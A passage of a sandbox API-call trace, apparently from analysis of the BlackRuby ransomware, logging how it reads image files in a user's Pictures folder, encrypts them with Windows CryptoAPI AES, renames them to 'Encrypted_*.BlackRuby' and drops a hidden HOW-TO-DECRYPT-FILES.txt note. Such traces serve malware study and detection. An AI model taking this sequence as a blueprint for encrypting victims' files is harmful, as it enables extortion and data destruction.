lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Encrypted_Y6gdLHOo66QqQFYt3QcLSfPSMqDW1szwqH2ilYqiMR.BlackRuby", lpFilePart=0x0) returned 0x81 [0061.743] GetLastError () returned 0xb7 [0061.743] SetErrorMode (uMode=0x1) returned 0x0 [0061.743] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\fofxoz1ya_jlmxbhgnv.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b54db0, ftCreationTime.dwHighDateTime=0x1d3509e, ftLastAccessTime.dwLowDateTime=0xc9c5c5c0, ftLastAccessTime.dwHighDateTime=0x1d356b4, ftLastWriteTime.dwLowDateTime=0x2cfe5240, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1f80)) returned 1 [0061.743] GetLastError () returned 0xb7 [0061.743] SetErrorMode (uMode=0x0) returned 0x1 [0061.743] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\FoFXoZ1ya_jlMxBHGnV.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\fofxoz1ya_jlmxbhgnv.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Encrypted_Y6gdLHOo66QqQFYt3QcLSfPSMqDW1szwqH2ilYqiMR.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\encrypted_y6gdlhoo66qqqfyt3qclsfpsmqdw1szwqh2ilyqimr.blackruby")) returned 1 [0061.744] GetLastError () returned 0xb7 [0061.744] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5b [0061.746] GetLastError () returned 0xb7 [0061.746] SetErrorMode (uMode=0x1) returned 0x0 [0061.746] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.749] GetLastError () returned 0x0 [0061.750] GetFileType (hFile=0x258) returned 0x1 [0061.750] SetErrorMode (uMode=0x0) returned 0x1 [0061.750] GetFileType (hFile=0x258) returned 0x1 [0061.755] CloseHandle (hObject=0x258) returned 1 [0061.755] GetLastError () returned 0x0 [0061.755] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5b [0061.755] GetLastError () returned 0x0 [0061.755] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0061.756] GetLastError () returned 0x0 [0061.756] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg", lpFilePart=0x0) returned 0x53 [0061.756] GetLastError () returned 0x0 [0061.756] SetErrorMode (uMode=0x1) returned 0x0 [0061.756] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\ncsvhb6w5may.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1bf5f0c | out: lpFileInformation=0x1bf5f0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5cf1550, ftCreationTime.dwHighDateTime=0x1d35913, ftLastAccessTime.dwLowDateTime=0xda830670, ftLastAccessTime.dwHighDateTime=0x1d358f8, ftLastWriteTime.dwLowDateTime=0xda830670, ftLastWriteTime.dwHighDateTime=0x1d358f8, nFileSizeHigh=0x0, nFileSizeLow=0xb770)) returned 1 [0061.756] GetLastError () returned 0x0 [0061.756] SetErrorMode (uMode=0x0) returned 0x1 [0061.756] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg", lpFilePart=0x0) returned 0x53 [0061.756] GetLastError () returned 0x0 [0061.756] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg", lpFilePart=0x0) returned 0x53 [0061.756] GetLastError () returned 0x0 [0061.756] SetErrorMode (uMode=0x1) returned 0x0 [0061.756] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\ncsvhb6w5may.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.756] GetLastError () returned 0x0 [0061.756] GetFileType (hFile=0x258) returned 0x1 [0061.756] SetErrorMode (uMode=0x0) returned 0x1 [0061.756] GetFileType (hFile=0x258) returned 0x1 [0061.756] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0xb770 [0061.757] GetLastError () returned 0x0 [0061.757] ReadFile (in: hFile=0x258, lpBuffer=0x1bf7bf0, nNumberOfBytesToRead=0xb770, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1bf7bf0*, lpNumberOfBytesRead=0x18ec40*=0xb770, lpOverlapped=0x0) returned 1 [0061.757] GetLastError () returned 0x0 [0061.757] CloseHandle (hObject=0x258) returned 1 [0061.757] GetLastError () returned 0x0 [0061.757] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg", lpFilePart=0x0) returned 0x53 [0061.758] GetLastError () returned 0x0 [0061.758] SetErrorMode (uMode=0x1) returned 0x0 [0061.758] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\ncsvhb6w5may.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5cf1550, ftCreationTime.dwHighDateTime=0x1d35913, ftLastAccessTime.dwLowDateTime=0xda830670, ftLastAccessTime.dwHighDateTime=0x1d358f8, ftLastWriteTime.dwLowDateTime=0xda830670, ftLastWriteTime.dwHighDateTime=0x1d358f8, nFileSizeHigh=0x0, nFileSizeLow=0xb770)) returned 1 [0061.758] GetLastError () returned 0x0 [0061.758] SetErrorMode (uMode=0x0) returned 0x1 [0061.768] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c68ecc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360fa0) returned 1 [0061.768] GetLastError () returned 0x0 [0061.768] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.768] GetLastError () returned 0x0 [0061.773] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.773] GetLastError () returned 0x0 [0061.773] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360d60) returned 1 [0061.774] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.774] GetLastError () returned 0x0 [0061.774] CryptSetKeyParam (hKey=0x360d60, dwParam=0x4, pbData=0x1c95f18*=0x1, dwFlags=0x0) returned 1 [0061.774] GetLastError () returned 0x0 [0061.774] CryptSetKeyParam (hKey=0x360d60, dwParam=0x1, pbData=0x1c95ee4, dwFlags=0x0) returned 1 [0061.774] GetLastError () returned 0x0 [0061.774] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c95f60*, pdwDataLen=0x18ec30*=0xb870, dwBufLen=0xb870 | out: pbData=0x1c95f60*, pdwDataLen=0x18ec30*=0xb870) returned 1 [0061.774] GetLastError () returned 0x0 [0061.774] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cad06c*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1cad06c*, pdwDataLen=0x18ec48*=0x10) returned 1 [0061.774] GetLastError () returned 0x0 [0061.774] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cad09c*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1cad09c*, pdwDataLen=0x18ec50*=0x10) returned 1 [0061.774] GetLastError () returned 0x0 [0061.775] CryptDestroyKey (hKey=0x360fa0) returned 1 [0061.775] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.775] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.775] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg", lpFilePart=0x0) returned 0x53 [0061.775] GetLastError () returned 0x0 [0061.775] SetErrorMode (uMode=0x1) returned 0x0 [0061.776] GetFileType (hFile=0x258) returned 0x1 [0061.776] GetFileType (hFile=0x258) returned 0x1 [0061.777] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\nCSVhb6w5may.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\ncsvhb6w5may.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Encrypted_RbKqVEWSqYKT1qGgOXohare7XtX4pgXJoWOKvu9.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\encrypted_rbkqvewsqykt1qggoxohare7xtx4pgxjowokvu9.blackruby")) returned 1 [0061.778] GetLastError () returned 0xb7 [0061.779] SetErrorMode (uMode=0x0) returned 0x1 [0061.779] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png", lpFilePart=0x0) returned 0x55 [0061.779] GetLastError () returned 0x5 [0061.779] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png", lpFilePart=0x0) returned 0x55 [0061.779] GetLastError () returned 0x5 [0061.779] SetErrorMode (uMode=0x1) returned 0x0 [0061.780] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\q0jsj6qfkupit-.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.780] GetLastError () returned 0x0 [0061.780] GetFileType (hFile=0x258) returned 0x1 [0061.780] SetErrorMode (uMode=0x0) returned 0x1 [0061.780] GetFileType (hFile=0x258) returned 0x1 [0061.780] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x4822 [0061.780] GetLastError () returned 0x0 [0061.780] ReadFile (in: hFile=0x258, lpBuffer=0x1cd7ca0, nNumberOfBytesToRead=0x4822, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1cd7ca0*, lpNumberOfBytesRead=0x18ec40*=0x4822, lpOverlapped=0x0) returned 1 [0061.781] GetLastError () returned 0x0 [0061.781] CloseHandle (hObject=0x258) returned 1 [0061.781] GetLastError () returned 0x0 [0061.781] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png", lpFilePart=0x0) returned 0x55 [0061.781] GetLastError () returned 0x0 [0061.781] SetErrorMode (uMode=0x1) returned 0x0 [0061.781] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\q0jsj6qfkupit-.png"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89615930, ftCreationTime.dwHighDateTime=0x1d34d05, ftLastAccessTime.dwLowDateTime=0x52eeeb20, ftLastAccessTime.dwHighDateTime=0x1d35786, ftLastWriteTime.dwLowDateTime=0x52eeeb20, ftLastWriteTime.dwHighDateTime=0x1d35786, nFileSizeHigh=0x0, nFileSizeLow=0x4822)) returned 1 [0061.781] GetLastError () returned 0x0 [0061.781] SetErrorMode (uMode=0x0) returned 0x1 [0061.781] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c680) returned 1 [0061.781] GetLastError () returned 0x0 [0061.820] CryptImportKey (in: hProv=0x37c680, pbData=0x1b40748, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360b60) returned 1 [0061.820] GetLastError () returned 0x0 [0061.820] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.820] GetLastError () returned 0x0 [0061.825] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.825] GetLastError () returned 0x0 [0061.825] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360ae0) returned 1 [0061.825] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.825] GetLastError () returned 0x0 [0061.825] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1b6d794*=0x1, dwFlags=0x0) returned 1 [0061.825] GetLastError () returned 0x0 [0061.825] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1b6d760, dwFlags=0x0) returned 1 [0061.825] GetLastError () returned 0x0 [0061.825] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b6d7dc*, pdwDataLen=0x18ec30*=0x4920, dwBufLen=0x4920 | out: pbData=0x1b6d7dc*, pdwDataLen=0x18ec30*=0x4920) returned 1 [0061.825] GetLastError () returned 0x0 [0061.825] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b76a48*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1b76a48*, pdwDataLen=0x18ec48*=0x10) returned 1 [0061.825] GetLastError () returned 0x0 [0061.825] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b76a78*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1b76a78*, pdwDataLen=0x18ec50*=0x10) returned 1 [0061.825] GetLastError () returned 0x0 [0061.825] CryptDestroyKey (hKey=0x360b60) returned 1 [0061.825] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0061.825] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0061.825] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png", lpFilePart=0x0) returned 0x55 [0061.825] GetLastError () returned 0x0 [0061.825] SetErrorMode (uMode=0x1) returned 0x0 [0061.825] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\q0jsj6qfkupit-.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.826] GetLastError () returned 0xb7 [0061.826] GetFileType (hFile=0x258) returned 0x1 [0061.826] SetErrorMode (uMode=0x0) returned 0x1 [0061.826] GetFileType (hFile=0x258) returned 0x1 [0061.827] CloseHandle (hObject=0x258) returned 1 [0061.827] GetLastError () returned 0xb7 [0061.827] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png", lpFilePart=0x0) returned 0x55 [0061.827] GetLastError () returned 0xb7 [0061.827] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Encrypted_XGwqb86IHOWm9YcicNppC7U9TYkcn8hlaLk14DkOe.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Encrypted_XGwqb86IHOWm9YcicNppC7U9TYkcn8hlaLk14DkOe.BlackRuby", lpFilePart=0x0) returned 0x80 [0061.827] GetLastError () returned 0xb7 [0061.827] SetErrorMode (uMode=0x1) returned 0x0 [0061.827] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\q0jsj6qfkupit-.png"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89615930, ftCreationTime.dwHighDateTime=0x1d34d05, ftLastAccessTime.dwLowDateTime=0x52eeeb20, ftLastAccessTime.dwHighDateTime=0x1d35786, ftLastWriteTime.dwLowDateTime=0x2d0c9a80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4930)) returned 1 [0061.827] GetLastError () returned 0xb7 [0061.827] SetErrorMode (uMode=0x0) returned 0x1 [0061.828] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Q0JsJ6qfKuPIt-.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\q0jsj6qfkupit-.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Encrypted_XGwqb86IHOWm9YcicNppC7U9TYkcn8hlaLk14DkOe.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\encrypted_xgwqb86ihowm9ycicnppc7u9tykcn8hlalk14dkoe.blackruby")) returned 1 [0061.828] GetLastError () returned 0xb7 [0061.828] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5b [0061.828] GetLastError () returned 0xb7 [0061.828] SetErrorMode (uMode=0x1) returned 0x0 [0061.829] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.829] GetLastError () returned 0x5 [0061.829] SetErrorMode (uMode=0x0) returned 0x1 [0061.830] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", lpFilePart=0x0) returned 0x59 [0061.830] GetLastError () returned 0x5 [0061.830] SetErrorMode (uMode=0x1) returned 0x0 [0061.830] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\vctzfcurght_7pjucj.gif"), fInfoLevelId=0x0, lpFileInformation=0x1ba1b9c | out: lpFileInformation=0x1ba1b9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92ac4a0, ftCreationTime.dwHighDateTime=0x1d35228, ftLastAccessTime.dwLowDateTime=0xe291eae0, ftLastAccessTime.dwHighDateTime=0x1d35991, ftLastWriteTime.dwLowDateTime=0xe291eae0, ftLastWriteTime.dwHighDateTime=0x1d35991, nFileSizeHigh=0x0, nFileSizeLow=0x17d62)) returned 1 [0061.830] GetLastError () returned 0x5 [0061.830] SetErrorMode (uMode=0x0) returned 0x1 [0061.830] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", lpFilePart=0x0) returned 0x59 [0061.830] GetLastError () returned 0x5 [0061.830] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", lpFilePart=0x0) returned 0x59 [0061.830] GetLastError () returned 0x5 [0061.830] SetErrorMode (uMode=0x1) returned 0x0 [0061.830] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\vctzfcurght_7pjucj.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.830] GetLastError () returned 0x0 [0061.830] GetFileType (hFile=0x258) returned 0x1 [0061.830] SetErrorMode (uMode=0x0) returned 